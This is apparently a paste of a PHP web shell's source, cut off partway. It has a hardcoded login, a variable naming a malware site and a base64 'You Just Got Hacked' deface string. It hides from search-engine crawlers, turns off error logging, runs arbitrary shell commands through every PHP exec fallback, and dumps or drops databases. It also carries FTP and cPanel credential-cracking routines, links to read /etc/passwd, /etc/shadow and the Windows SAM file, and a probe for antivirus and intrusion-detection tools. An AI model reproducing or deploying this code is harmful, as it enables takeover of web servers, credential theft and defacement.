· 6 years ago · Nov 21, 2019, 04:48 PM
1<?php
2//========================================//
3//========+++Dhanush+++==========//
4//========================================//
5
6// Set Username & Password
7$user = "21232f297a57a5a743894a0e4a801fc3";
8$pass = "21232f297a57a5a743894a0e4a801fc3";
9
10$malsite = "http://fightagent.ru"; // Malware Site
11
12$ind = "WW91IGp1c3QgZ290IGhhY2tlZCAhISEhIQ=="; // "Deface Page" Base64 encoded "You Just Got Hacked !!"
13
14@set_magic_quotes_runtime(0);
15@ini_set('error_log',NULL);
16@ini_set('log_errors',0);
17ob_start();
18error_reporting(0);
19@set_time_limit(0);
20@ini_set('max_execution_time',0);
21@ini_set('output_buffering',0);
22
23if(!empty($_SERVER['HTTP_USER_AGENT']))
24{
25 $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
26 if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
27 header('HTTP/1.0 404 Not Found');
28 exit; }
29}
30// Dump Database
31if($_GET["action"] == "dumpDB")
32{
33 $self=$_SERVER["PHP_SELF"];
34 if(isset($_COOKIE['dbserver']))
35 {
36 $date = date("Y-m-d");
37 $dbserver = $_COOKIE["dbserver"];
38 $dbuser = $_COOKIE["dbuser"];
39 $dbpass = $_COOKIE["dbpass"];
40 $dbname = $_GET['dbname'];
41 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
42
43 $file = "Dump-$dbname-$date";
44
45 $file="Dump-$dbname-$date.sql";
46 $fp = fopen($file,"w");
47
48 function write($data)
49 {
50 global $fp;
51
52 fwrite($fp,$data);
53
54 }
55 mysql_connect ($dbserver, $dbuser, $dbpass);
56 mysql_select_db($dbname);
57 $tables = mysql_query ("SHOW TABLES");
58 while ($i = mysql_fetch_array($tables))
59 {
60 $i = $i['Tables_in_'.$dbname];
61 $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
62 write($create['Create Table'].";");
63 $sql = mysql_query ("SELECT * FROM ".$i);
64 if (mysql_num_rows($sql)) {
65 while ($row = mysql_fetch_row($sql)) {
66 foreach ($row as $j => $k) {
67 $row[$j] = "'".mysql_escape_string($k)."'";
68 }
69 write("INSERT INTO $i VALUES(".implode(",", $row).");");
70 }
71 }
72 }
73
74 fclose ($fp);
75
76 header("Content-Disposition: attachment; filename=" . $file);
77 header("Content-Type: application/download");
78 header("Content-Length: " . filesize($file));
79 flush();
80
81 $fp = fopen($file, "r");
82 while (!feof($fp))
83 {
84 echo fread($fp, 65536);
85 flush();
86 }
87 fclose($fp);
88 }
89}
90function shellstyle()
91{
92 echo "<style type=\"text/css\">
93<!--
94
95body,td,th {
96 color: #FF0000;
97 font-size: 14px;
98}
99input.but {
100 background-color:#000000;
101 color:#FF0000;
102 border : 1px solid #1B1B1B;
103}
104a:link {
105 color: #00FF00;
106 text-decoration:none;
107 font-weight:500;
108}
109a:hover {
110 color:#00FF00;
111 text-decoration:underline;
112}
113font.txt
114{
115 color: #00FF00;
116 text-decoration:none;
117 font-size:14px;
118}
119font.mainmenu
120{
121 color:#FF0000;
122 text-decoration:none;
123 font-size:14px;
124}
125a:visited {
126 color: #006600;
127}
128input.box
129{
130 background-color:#0C0C0C;
131 color: lime;
132 border : 1px solid #1B1B1B;
133 -moz-border-radius:6px;
134 width:400;
135 border-radius:6px;
136}
137input.sbox
138{
139 background-color:#0C0C0C;
140 color: lime;
141 border : 1px solid #1B1B1B;
142 -moz-border-radius:6px;
143 width:180;
144 border-radius:6px;
145}
146select.sbox
147{
148 background-color:#0C0C0C;
149 color: lime;
150 border : 1px solid #1B1B1B;
151 -moz-border-radius:6px;
152 width:180;
153 border-radius:6px;
154}
155select.box
156{
157 background-color:#0C0C0C;
158 color: lime;
159 border : 1px solid #1B1B1B;
160 -moz-border-radius:6px;
161 width:400;
162 border-radius:6px;
163}
164
165textarea.box
166{
167 border : 3px solid #111;
168 background-color:#161616;
169 color : lime;
170 margin-top: 10px;
171 -moz-border-radius:7px;
172 border-radius:7px;
173}
174body {
175 background-color:#000000;
176}
177.myphp table
178{
179 width:100%;
180 padding:18px 10px;
181 border : 1px solid #1B1B1B;
182}
183.myphp td
184{
185 background:#111111;
186 color:#00ff00;
187 padding:6px 8px;
188 border-bottom:1px solid #222222;
189 font-size:14px;
190}
191.myphp th, th
192{
193 background:#181818;
194
195}
196-->
197</style>";
198}
199if(isset($_COOKIE['hacked']) && $_COOKIE['hacked']==md5($pass))
200{
201 $self=$_SERVER["PHP_SELF"];
202 $os = "N/D";
203 $bdmessage = null;
204 $dir = getcwd();
205
206 if(stristr(php_uname(),"Windows"))
207 {
208 $SEPARATOR = '\\';
209 $os = "Windows";
210 $directorysperator="\\";
211 }
212 else if(stristr(php_uname(),"Linux"))
213 {
214 $os = "Linux";
215 $directorysperator='/';
216 }
217 function Trail($d,$directsperator)
218 {
219 $d=explode($directsperator,$d);
220 array_pop($d);
221 array_pop($d);
222 $str=implode($d,$directsperator);
223 return $str;
224 }
225
226 function ftp_check($host,$user,$pass,$timeout)
227 {
228 $ch = curl_init();
229 curl_setopt($ch, CURLOPT_URL, "ftp://$host");
230 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
231 curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
232 curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
233 curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
234 curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
235 curl_setopt($ch, CURLOPT_FAILONERROR, 1);
236 $data = curl_exec($ch);
237 if ( curl_errno($ch) == 28 )
238 {
239 print "<center><b>
240 Error : Connection Timeout.
241 Please Check The Target Hostname .</b></center>";exit;
242 }
243 else if ( curl_errno($ch) == 0 )
244 {
245 print "<center><b>[~]</b><font class=txt>
246 Cracking Success With Username "</font><font color=\"#FF0000\">$user</font><font color=\"#008000\">\"
247 and Password \"</font><font color=\"#FF0000\">$pass</font><font color=\"#008000\">\"</font></b></center><br><br>";
248 }
249 curl_close($ch);
250 }
251
252 function cpanel_check($host,$user,$pass,$timeout)
253 {
254 global $cpanel_port;
255 $ch = curl_init();
256 curl_setopt($ch, CURLOPT_URL, "http://$host:" . $cpanel_port);
257 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
258 curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
259 curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
260 curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
261 curl_setopt($ch, CURLOPT_FAILONERROR, 1);
262 $data = curl_exec($ch);
263 if ( curl_errno($ch) == 28 )
264 { print "<center><b>Error : Connection Timeout.
265 Please Check The Target Hostname.</b></center>";exit;}
266 else if ( curl_errno($ch) == 0 ){
267 print "<ecnter><b>[~]</b><font class=txt><b>
268
269 Cracking Success With Username "</font><font color=\"#FF0000\">$user</font><font color=\"#008000\">\"
270 and Password \"</font><font color=\"#FF0000\">$pass</font><font color=\"#008000\">\"</font></b></center><br><br>";
271 }
272 curl_close($ch);
273 }
274
275 // Database functions
276 function listdatabase()
277 {
278 $self=$_SERVER["PHP_SELF"];
279 ?>
280 <br>
281 <form>
282 <table>
283 <tr>
284 <td><input type="text" class="box" name="dbname"></td>
285 <td><input type="button" onClick="viewtables('createDB',dbname.value)" value=" Create Database " class="but"></td>
286 </tr>
287 </table>
288 </form>
289 <br>
290 <?php
291 $mysqlHandle = mysql_connect ($_COOKIE['dbserver'], $_COOKIE['dbuser'], $_COOKIE['dbpass']);
292 $result = mysql_query("SHOW DATABASE");
293 echo "<table cellspacing=1 cellpadding=5 border=1 style=width:60%;>\n";
294
295 $pDB = mysql_list_dbs( $mysqlHandle );
296 $num = mysql_num_rows( $pDB );
297 for( $i = 0; $i < $num; $i++ )
298 {
299 $dbname = mysql_dbname( $pDB, $i );
300 mysql_select_db($dbname,$mysqlHandle);
301 $result = mysql_query("SHOW TABLES");
302 $num_of_tables = mysql_num_rows($result);
303 echo "<tr>\n";
304 echo "<td><a href=# onClick=\"viewtables('listTables','$dbname')\"><font size=3>$dbname</font></a> ($num_of_tables)</td>\n";
305 echo "<td><a href=# onClick=\"viewtables('listTables','$dbname')\">Tables</a></td>\n";
306 echo "<td><a href=# onClick=\"viewtables('dropDB','$dbname')\">Drop</a></td>\n";
307 echo "<td><a href='$self?action=dumpDB&dbname=$dbname' onClick=\"return confirm('Dump Database \'$dbname\'?')\">Dump</a></td>\n";
308 echo "</tr>\n";
309 }
310 echo "</table>\n";
311 mysql_close($mysqlHandle);
312 }
313
314 function listtable()
315 {
316 $self=$_SERVER["PHP_SELF"];
317 $dbserver = $_COOKIE["dbserver"];
318 $dbuser = $_COOKIE["dbuser"];
319 $dbpass = $_COOKIE["dbpass"];
320 $dbname = $_GET['dbname'];
321 echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
322 ?>
323 <br><br>
324 <form>
325 <table>
326
327 <tr>
328 <td><input type="text" class="box" name="tablename"></td>
329 <td><input type="button" onClick="viewtables('createtable','<?php echo $_GET['dbname'];?>')" value=" Create Table " name="createmydb" class="but"></td>
330 </tr>
331 </table>
332
333 <br>
334 <form>
335 <table>
336 <tr>
337 <td><textarea cols="60" rows="7" name="executemyquery" class="box">Execute Query..</textarea></td>
338 </tr>
339 <tr>
340 <td><input type="button" onClick="viewtables('executequery','<?php echo $_GET['dbname'];?>','<?php echo $_GET['tablename']; ?>','','',executemyquery.value)" value="Execute" class="but"></td>
341 </tr>
342 </table>
343 </form>
344
345 <?php
346
347 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
348
349 mysql_select_db($dbname);
350 $pTable = mysql_list_tables( $dbname );
351
352 if( $pTable == 0 ) {
353 $msg = mysql_error();
354 echo "<h3>Error : $msg</h3><p>\n";
355 return;
356 }
357 $num = mysql_num_rows( $pTable );
358
359 echo "<table cellspacing=1 cellpadding=5 border=1 style=width:60%;>\n";
360
361 for( $i = 0; $i < $num; $i++ )
362 {
363 $tablename = mysql_tablename( $pTable, $i );
364 $result = mysql_query("select * from $tablename");
365 $num_rows = mysql_num_rows($result);
366 echo "<tr>\n";
367 echo "<td>\n";
368 echo "<a href=# onClick=\"viewtables('viewdata','$dbname','$tablename')\"><font size=3>$tablename</font></a> ($num_rows)\n";
369 echo "</td>\n";
370 echo "<td>\n";
371 echo "<a href=# onClick=\"viewtables('viewSchema','$dbname','$tablename')\">Schema</a>\n";
372 echo "</td>\n";
373 echo "<td>\n";
374 echo "<a href=# onClick=\"viewtables('viewdata','$dbname','$tablename')\">Data</a>\n";
375 echo "</td>\n";
376 echo "<td>\n";
377 echo "<a href=# onClick=\"viewtables('empty','$dbname','$tablename')\">Empty</a>\n";
378 echo "</td>\n";
379 echo "<td>\n";
380 echo "<a href=# onClick=\"viewtables('dropTable','$dbname','$tablename')\">Drop</a>\n";
381 echo "</td>\n";
382 echo "</tr>\n";
383 }
384
385 echo "</table></form>";
386 mysql_close($mysqlHandle);
387 echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
388 }
389
390
391 function paramexe($n, $v)
392 {
393 $v = trim($v);
394 if($v)
395 {
396 echo '<span><font size=3>' . $n . ': </font></span>';
397 if(strpos($v, "\n") === false)
398 echo '<font size=2>' . $v . '</font><br>';
399 else
400 echo '<pre class=ml1><font class=txt size=3>' . $v . '</font></pre>';
401 }
402 }
403
404
405
406 function rrmdir($dir)
407 {
408 if (is_dir($dir)) // ensures that we actually have a directory
409 {
410 $objects = scandir($dir); // gets all files and folders inside
411 foreach ($objects as $object)
412 {
413 if ($object != '.' && $object != '..')
414 {
415 if (is_dir($dir . '/' . $object))
416 {
417 // if we find a directory, do a recursive call
418 rrmdir($dir . '/' . $object);
419 }
420 else
421 {
422 // if we find a file, simply delete it
423 unlink($dir . '/' . $object);
424 }
425 }
426 }
427 // the original directory is now empty, so delete it
428 rmdir($dir);
429 }
430 }
431
432 function which($pr)
433 {
434 $path = execmd("which $pr");
435 if(!empty($path))
436 return trim($path);
437 else
438 return trim($pr);
439 }
440
441 function magicboom($text)
442 {
443 if (!get_magic_quotes_gpc())
444 return $text;
445 return stripslashes($text);
446 }
447
448function execmd($cmd,$d_functions="None")
449{
450 if($d_functions=="None")
451 {
452 $ret=passthru($cmd);
453 return $ret;
454 }
455 $funcs=array("shell_exec","exec","passthru","system","popen","proc_open");
456 $d_functions=str_replace(" ","",$d_functions);
457 $dis_funcs=explode(",",$d_functions);
458 foreach($funcs as $safe)
459 {
460 if(!in_array($safe,$dis_funcs))
461 {
462 if($safe=="exec")
463 {
464 $ret=@exec($cmd);
465 $ret=join("\n",$ret);
466 return $ret;
467 }
468 elseif($safe=="system")
469 {
470 $ret=@system($cmd);
471 return $ret;
472 }
473 elseif($safe=="passthru")
474 {
475 $ret=@passthru($cmd);
476 return $ret;
477 }
478 elseif($safe=="shell_exec")
479 {
480 $ret=@shell_exec($cmd);
481 return $ret;
482 }
483 elseif($safe=="popen")
484 {
485 $ret=@popen("$cmd",'r');
486 if(is_resource($ret))
487 {
488 while(@!feof($ret))
489 $read.=@fgets($ret);
490 @pclose($ret);
491 return $read;
492 }
493 return -1;
494 }
495 elseif($safe="proc_open")
496 {
497 $cmdpipe=array(
498 0=>array('pipe','r'),
499 1=>array('pipe','w')
500 );
501 $resource=@proc_open($cmd,$cmdpipe,$pipes);
502 if(@is_resource($resource))
503 {
504 while(@!feof($pipes[1]))
505 $ret.=@fgets($pipes[1]);
506 @fclose($pipes[1]);
507 @proc_close($resource);
508 return $ret;
509 }
510 return -1;
511 }
512 }
513 }
514 return -1;
515}
516
517 function getDisabledFunctions()
518 {
519 if(!ini_get('disable_functions'))
520 {
521 return "None";
522 }
523 else
524 {
525 return @ini_get('disable_functions');
526 }
527 }
528
529 function getFilePermissions($file)
530 {
531 $perms = fileperms($file);
532
533 if (($perms & 0xC000) == 0xC000) {
534 // Socket
535 $info = 's';
536 } elseif (($perms & 0xA000) == 0xA000) {
537 // Symbolic Link
538 $info = 'l';
539 } elseif (($perms & 0x8000) == 0x8000) {
540 // Regular
541 $info = '-';
542 } elseif (($perms & 0x6000) == 0x6000) {
543 // Block special
544 $info = 'b';
545 } elseif (($perms & 0x4000) == 0x4000) {
546 // Directory
547 $info = 'd';
548 } elseif (($perms & 0x2000) == 0x2000) {
549 // Character special
550 $info = 'c';
551 } elseif (($perms & 0x1000) == 0x1000) {
552 // FIFO pipe
553 $info = 'p';
554 } else {
555 // Unknown
556 $info = 'u';
557 }
558
559 // Owner
560 $info .= (($perms & 0x0100) ? 'r' : '-');
561 $info .= (($perms & 0x0080) ? 'w' : '-');
562 $info .= (($perms & 0x0040) ?
563 (($perms & 0x0800) ? 's' : 'x' ) :
564 (($perms & 0x0800) ? 'S' : '-'));
565
566 // Group
567 $info .= (($perms & 0x0020) ? 'r' : '-');
568 $info .= (($perms & 0x0010) ? 'w' : '-');
569 $info .= (($perms & 0x0008) ?
570 (($perms & 0x0400) ? 's' : 'x' ) :
571 (($perms & 0x0400) ? 'S' : '-'));
572
573 // World
574 $info .= (($perms & 0x0004) ? 'r' : '-');
575 $info .= (($perms & 0x0002) ? 'w' : '-');
576 $info .= (($perms & 0x0001) ?
577 (($perms & 0x0200) ? 't' : 'x' ) :
578 (($perms & 0x0200) ? 'T' : '-'));
579
580 return $info;
581}
582 function filepermscolor($filename)
583 {
584 if(!@is_readable($filename))
585 return "<font color=\"#FF0000\">".getFilePermissions($filename)."</font>";
586 else if(!@is_writable($filename))
587 return "<font color=\"#FFFFFF\">".getFilePermissions($filename)."</font>";
588 else
589 return "<font color=\"#00FF00\">".getFilePermissions($filename)."</font>";
590 }
591
592 function yourip()
593 {
594 echo $_SERVER["REMOTE_ADDR"];
595 }
596 function phpver()
597 {
598 $pv=@phpversion();
599 echo $pv;
600 }
601 function magic_quote()
602 {
603 echo get_magic_quotes_gpc()?"<font class=txt>ON</font>":"<font color='red'>OFF</font>";
604 }
605 function serverip()
606 {
607 echo getenv('SERVER_ADDR');
608 }
609 function serverport()
610 {
611 echo $_SERVER['SERVER_PORT'];
612 }
613 function safe()
614 {
615 global $sm;
616 return $sm?"ON :( :'( (Most of the Features will Not Work!)":"OFF";
617 }
618 function serveradmin()
619 {
620 echo $_SERVER['SERVER_ADMIN'];
621 }
622 function systeminfo()
623 {
624 echo php_uname();
625 }
626 function curlinfo()
627 {
628 echo function_exists('curl_version')?("<font class=txt>Enabled</font>"):("<font color='red'>Disabled</font>");
629 }
630 function oracleinfo()
631 {
632 echo function_exists('ocilogon')?("<font class=txt>Enabled</font>"):("<font color='red'>Disabled</font>");
633 }
634 function mysqlinfo()
635 {
636 echo function_exists('mysql_connect')?("<font class=txt>Enabled</font>"):("<font color='red'>Disabled</font>");
637 }
638 function mssqlinfo()
639 {
640 echo function_exists('mssql_connect')?("<font class=txt>Enabled</font>"):("<font color='red'>Disabled</font>");
641 }
642 function postgresqlinfo()
643 {
644 echo function_exists('pg_connect')?("<font class=txt>Enabled</font>"):("<font color='red'>Disabled</font>");
645 }
646 function softwareinfo()
647 {
648 echo getenv("SERVER_SOFTWARE");
649 }
650 function download()
651 {
652 $frd=$_GET['download'];
653 $prd=explode("/",$frd);
654 for($i=0;$i<sizeof($prd);$i++)
655 {
656 $nfd=$prd[$i];
657 }
658 @ob_clean();
659 header("Content-type: application/octet-stream");
660 header("Content-length: ".filesize($nfd));
661 header("Content-disposition: attachment; filename=\"".$nfd."\";");
662 readfile($nfd);
663
664 exit;
665
666 }
667
668 function HumanReadableFilesize($size)
669 {
670 $mod = 1024;
671 $units = explode(' ','B KB MB GB TB PB');
672 for ($i = 0; $size > $mod; $i++)
673 {
674 $size /= $mod;
675 }
676 return round($size, 2) . ' ' . $units[$i];
677 }
678
679 function showDrives()
680 {
681 global $self;
682 foreach(range('A','Z') as $drive)
683 {
684 if(is_dir($drive.':\\'))
685 {
686 $myd = $drive.":\\";
687 ?>
688 <a href=javascript:void(0) onClick="changedir('dir','<?php echo addslashes($myd); ?>')">
689 <?php echo $myd; ?>
690 </a>
691 <?php
692 }
693 }
694 }
695 function diskSpace()
696 {
697 return disk_total_space("/");
698 }
699 function freeSpace()
700 {
701 return disk_free_space("/");
702 }
703
704 function thiscmd($p)
705 {
706 $path = myexe('which ' . $p);
707 if(!empty($path))
708 return $path;
709 return false;
710 }
711
712 function mysecinfo()
713 {
714 function myparam($n, $v)
715 {
716 $v = trim($v);
717 if($v)
718 {
719 echo '<span><font color =red size=3>' . $n . ': </font></span>';
720 if(strpos($v, "\n") === false)
721 echo '<font color =lime size=3>' . $v . '</font><br>';
722 else
723 echo '<pre class=ml1><font color =lime size=3>' . $v . '</font></pre>';
724 }
725 }
726
727 myparam('Server software', @getenv('SERVER_SOFTWARE'));
728 if(function_exists('apache_get_modules'))
729 myparam('Loaded Apache modules', implode(', ', apache_get_modules()));
730 myparam('Open base dir', @ini_get('open_basedir'));
731 myparam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
732 myparam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
733 $temp=array();
734 if(function_exists('mysql_get_client_info'))
735 $temp[] = "MySql (".mysql_get_client_info().")";
736 if(function_exists('mssql_connect'))
737 $temp[] = "MSSQL";
738 if(function_exists('pg_connect'))
739 $temp[] = "PostgreSQL";
740 if(function_exists('oci_connect'))
741 $temp[] = "Oracle";
742 myparam('Supported databases', implode(', ', $temp));
743 echo '<br>';
744
745 if($GLOBALS['os'] == 'Linux') {
746 myparam('Distro : ', myexe("cat /etc/*-release"));
747 myparam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href=javascript:void(0) onClick=\"getmydata('passwd')\">[view]</a>":'no');
748 myparam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href=javascript:void(0) onClick=\"getmydata('shadow')\">[view]</a>":'no');
749 myparam('OS version', @file_get_contents('/proc/version'));
750 myparam('Distr name', @file_get_contents('/etc/issue.net'));
751 myparam('Where is Perl?', myexe('whereis perl'));
752 myparam('Where is Python?', myexe('whereis python'));
753 myparam('Where is gcc?', myexe('whereis gcc'));
754 myparam('Where is apache?', myexe('whereis apache'));
755 myparam('CPU?', myexe('cat /proc/cpuinfo'));
756 myparam('RAM', myexe('free -m'));
757 myparam('Mount options', myexe('cat /etc/fstab'));
758 myparam('User Limits', myexe('ulimit -a'));
759
760
761 if(!$GLOBALS['safe_mode']) {
762 $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
763 $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
764 $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
765 echo '<br>';
766 $temp=array();
767 foreach ($userful as $item)
768 if(thiscmd($item))
769 $temp[] = $item;
770 myparam('Userful', implode(', ',$temp));
771 $temp=array();
772 foreach ($danger as $item)
773 if(thiscmd($item))
774 $temp[] = $item;
775 myparam('Danger', implode(', ',$temp));
776 $temp=array();
777 foreach ($downloaders as $item)
778 if(thiscmd($item))
779 $temp[] = $item;
780 myparam('Downloaders', implode(', ',$temp));
781 echo '<br/>';
782 myparam('HDD space', myexe('df -h'));
783 myparam('Hosts', @file_get_contents('/etc/hosts'));
784
785 }
786 } else {
787 $repairsam = addslashes($_SERVER["WINDIR"]."\\repair\\sam");
788 $hostpath = addslashes($_SERVER["WINDIR"]."\system32\drivers\etc\hosts");
789 $netpath = addslashes($_SERVER["WINDIR"]."\system32\drivers\etc\\networks");
790 $sampath = addslashes($_SERVER["WINDIR"]."\system32\drivers\etc\lmhosts.sam");
791 echo "<font size=3>Password File : </font><a href=".$_SERVER['PHP_SELF']."?download=" . $repairsam ."><b><font class=txt size=3>Download password file</font></b></a><br>";
792 echo "<font size=3>Config Files : </font><a href=javascript:void(0) onClick=\"fileaction('open','$hostpath')\"><b><font class=txt size=3>[ Hosts ]</font></b></a> <a href=javascript:void(0) onClick=\"fileaction('open','$netpath')\"><b><font class=txt size=3>[ Local Network Map ]</font></b></a> <a href=javascript:void(0) onClick=\"fileaction('open','$sampath')\"><b><font class=txt size=3>[ lmhosts ]</font></b></a><br>";
793 $base = (ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"ON":"OFF";
794 echo "<font size=3>Open Base Dir : </font><font class=txt size=3>" . $base . "</font><br>";
795 myparam('OS Version',myexe('ver'));
796 myparam('Account Settings',myexe('net accounts'));
797 myparam('User Accounts',myexe('net user'));
798 }
799 echo '</div>';
800 }
801
802
803
804 function myexe($in)
805 {
806 $out = '';
807 if (function_exists('exec')) {
808 @exec($in,$out);
809 $out = @join("\n",$out);
810 } elseif (function_exists('passthru')) {
811 ob_start();
812 @passthru($in);
813 $out = ob_get_clean();
814 } elseif (function_exists('system')) {
815 ob_start();
816 @system($in);
817 $out = ob_get_clean();
818 } elseif (function_exists('shell_exec')) {
819 $out = shell_exec($in);
820 } elseif (is_resource($f = @popen($in,"r"))) {
821 $out = "";
822 while(!@feof($f))
823 $out .= fread($f,1024);
824 pclose($f);
825 }
826 return $out;
827}
828
829 function exec_all($command)
830 {
831
832 $output = '';
833 if(function_exists('exec'))
834 {
835 exec($command,$output);
836 $output = join("\n",$output);
837 }
838
839 else if(function_exists('shell_exec'))
840 {
841 $output = shell_exec($command);
842 }
843
844 else if(function_exists('popen'))
845 {
846 $handle = popen($command , "r"); // Open the command pipe for reading
847 if(is_resource($handle))
848 {
849 if(function_exists('fread') && function_exists('feof'))
850 {
851 while(!feof($handle))
852 {
853 $output .= fread($handle, 512);
854 }
855 }
856 else if(function_exists('fgets') && function_exists('feof'))
857 {
858 while(!feof($handle))
859 {
860 $output .= fgets($handle,512);
861 }
862
863
864
865 }
866 }
867 pclose($handle);
868 }
869
870
871 else if(function_exists('system'))
872 {
873 ob_start(); //start output buffering
874 system($command);
875 $output = ob_get_contents(); // Get the ouput
876 ob_end_clean(); // Stop output buffering
877 }
878
879 else if(function_exists('passthru'))
880 {
881 ob_start(); //start output buffering
882 passthru($command);
883 $output = ob_get_contents(); // Get the ouput
884 ob_end_clean(); // Stop output buffering
885 }
886
887 else if(function_exists('proc_open'))
888 {
889 $descriptorspec = array(
890 1 => array("pipe", "w"), // stdout is a pipe that the child will write to
891 );
892 $handle = proc_open($command ,$descriptorspec , $pipes); // This will return the output to an array 'pipes'
893 if(is_resource($handle))
894 {
895 if(function_exists('fread') && function_exists('feof'))
896 {
897 while(!feof($pipes[1]))
898 {
899 $output .= fread($pipes[1], 512);
900 }
901 }
902 else if(function_exists('fgets') && function_exists('feof'))
903 {
904 while(!feof($pipes[1]))
905 {
906 $output .= fgets($pipes[1],512);
907 }
908 }
909 }
910 pclose($handle);
911 }
912
913 return(htmlspecialchars($output));
914
915}
916
917$basedir=(ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"<font class=txt>ON</font>":"<font color='red'>OFF</font>";
918$etc_passwd=@is_readable("/etc/passwd")?"Yes":"No";
919
920function getOGid($value)
921{
922 if(!function_exists('posix_getegid')) {
923 $user = @get_current_user();
924 $uid = @getmyuid();
925 $gid = @getmygid();
926 $group = "?";
927 $owner = $uid . "/". $gid;
928 return $owner;
929 } else {
930 $name=@posix_getpwuid(@fileowner($value));
931 $group=@posix_getgrgid(@filegroup($value));
932 $owner = $name['name']. " / ". $group['name'];
933 return $owner;
934 }
935}
936
937function mainfun($dir)
938{
939 global $ind, $directorysperator,$os;
940
941 $mydir = basename(dirname(__FILE__));
942 $pdir = str_replace($mydir,"",$dir);
943 $pdir = str_replace("/","",$dir);
944
945 $files = array();
946 $dirs = array();
947
948 $odir=opendir($dir);
949 while($file = readdir($odir))
950 {
951 if(is_dir($dir.'/'.$file))
952 {
953 $dirs[]=$file;
954 }
955 else
956 {
957 $files[]=$file;
958 }
959 }
960 $countfiles = count($dirs) + count($files);
961 $dircount = count($dirs);
962 $dircount = $dircount-2;
963 $myfiles = array_merge($dirs,$files);
964 $i = 0;
965 if(is_dir($dir))
966 {
967 if(scandir($dir) === false)
968 echo "<center><font size=3>Directory isn't readable</font></center>";
969 else
970 {
971?><form method="post" id="myform" name="myform">
972 <table id="maintable" style="width:100%;" align="center" cellpadding="3">
973 <tr><td colspan="7"><center><div id="showmydata"></div></center></td></tr>
974 <tr style="background-color:#0C0C0C;"><td colspan="8" align="center"><font size="3">Listing folder <?php echo $dir; ?></font> (<?php echo $dircount.' Dirs And '.count($files).' Files'; ?>)</td>
975 <tr style="background-color:#0C0C0C; height:12px;">
976 <th>Name</th>
977 <th>Size</th>
978 <th>Permissions</th>
979 <?php if($os != "Windows"){ echo "<th>Owner / Group</th>"; } ?>
980 <th>Modification Date</th>
981 <th>Rename</th>
982 <th>Download</th>
983 <th style="width:2%;">Action</th>
984 </tr>
985 <?php
986 foreach($myfiles as $val)
987 {
988 $vv = addslashes($dir . $directorysperator . $val);
989 $i++;
990
991 if($val == ".")
992 {
993
994 ?><tr style="background-color:#0C0C0C;" onMouseOver="style.backgroundColor='#000000'" onMouseOut="style.backgroundColor='#0C0C0C'"><td class='info'><a href=javascript:void(0) onClick="changedir('dir','<?php echo addslashes($dir); ?>')"><font class=txt>[ . ]</font></a></td><td><font size=2>CURDIR</font></td>
995 <td><a href=javascript:void(0) onClick="fileaction('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($dir); ?></a></td>
996
997 <?php if($os != 'Windows')
998 {
999 echo "<td align=center><font size=2>";
1000 echo getOGid($dir)."</font></td>";
1001 }
1002 ?>
1003
1004 <td align="center"><font class=txt><?php echo date('Y-m-d H:i:s', @filemtime($vv)); ?></font></td>
1005 <td></td><td></td><td></td></</tr><?php
1006
1007 }
1008 else if($val == "..")
1009 {
1010 $val = Trail($dir . $directorysperator . $val,$directorysperator);
1011 $vv = addslashes($val);
1012 if(empty($vv))
1013 $vv = "/"; ?>
1014 <tr style="background-color:#0C0C0C;" onMouseOver="style.backgroundColor='#000000'" onMouseOut="style.backgroundColor='#0C0C0C'"><td class='info'><a href=javascript:void(0) onClick="changedir('dir','<?php echo $vv; ?>')"><font class=txt>[ .. ]</font></a></td><td><font size=2>UPDIR</font></td>
1015 <td><a href=javascript:void(0) onClick="fileaction('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($val); ?></a></td>
1016 <?php if($os != 'Windows')
1017 {
1018 echo "<td align=center><font size=2>";
1019 echo getOGid($val)."</font></td>";
1020
1021 } ?>
1022 <td align="center"><font class=txt><?php echo date('Y-m-d H:i:s', @filemtime($val)); ?></font></td>
1023 <td></td><td></td><td></td></tr><?php continue;
1024 }
1025 else if(is_dir($vv))
1026 {
1027 ?>
1028 <tr style="background-color:#0C0C0C;" onMouseOver="style.backgroundColor='#000000'" onMouseOut="style.backgroundColor='#0C0C0C'">
1029 <td class='dir'><a href=javascript:void(0) onClick="changedir('dir','<?php echo $vv; ?>')">[ <?php echo $val; ?> ]</a></td>
1030 <td class='info'><font size=2>DIR</font></td>
1031
1032 <td class='info'><a href=javascript:void(0) onClick="fileaction('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($dir . $directorysperator . $val); ?></a></td>
1033 <?php if($os != 'Windows')
1034 {
